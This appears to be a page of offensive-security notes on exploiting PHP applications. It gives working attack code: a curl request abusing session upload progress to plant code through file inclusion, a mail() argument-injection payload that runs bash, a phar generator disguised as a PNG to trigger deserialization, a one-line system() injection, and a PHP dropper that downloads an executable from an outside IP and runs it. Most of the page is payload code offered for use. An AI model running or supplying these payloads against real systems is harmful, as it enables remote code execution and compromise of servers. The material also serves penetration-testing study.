Comment on page
PHP
PHP will create temporary files for files send with POST and for sessions. If we have a LFI we can get our php code onto the box and then include these.
curl --path-as-is '127.0.0.1/' -F 'PHP_SESSION_UPLOAD_PROGRESS=<payload' -F '[email protected]' -H 'Cookie: PHPSESSID=xct';
<?php
file_put_contents('/tmp/exploit',"whoami>/tmp/output");
mail("a","b","c","d","-H 'bash /tmp/exploit'");
?>
PHP's
REQUEST takes values from GET, POST and also COOKIE. This can lead to some interesting behavior by setting GET/POST and COOKIE parameters to different values. Values from COOKIE are disabled by default though.If we have a file_exists or similar method on uploaded content, we can request via phar:// wrapper. This allows to use deserialization gadgets.
function generate_base_phar($o, $prefix){
global $tempname;
@unlink($tempname);
$phar = new Phar($tempname);
$phar->startBuffering();
$phar->addFromString("test.txt", "$prefix xct_was_here");
$phar->setStub("$prefix<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($o);
$phar->stopBuffering();
$basecontent = file_get_contents($tempname);
@unlink($tempname);
return $basecontent;
}
$object = new <Your Class>;
var_dump(serialize($object));
# prefix for faking a valid png
$prefix = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\x00\x05\x0a\x00\x00\x01\x56";
$tempname = 'temp.phar'; // make it phar
$outfile = 'out.png';
file_put_contents($outfile, generate_base_phar($object, $prefix));
If no good gadgets are available SoapClient can be used to SSRF via gopher to other local services like MySQL.
Simple but effective:
${system($_GET[1])}&1=ls
<?php
$data = file_get_contents("http://10.10.14.51/xc.exe");
file_put_contents( "C:\\programdata\\xc_10.10.14.51_8080.exe", $data);
system("C:\\programdata\\xc_10.10.14.51_8080.exe");
?>
Last modified 9mo ago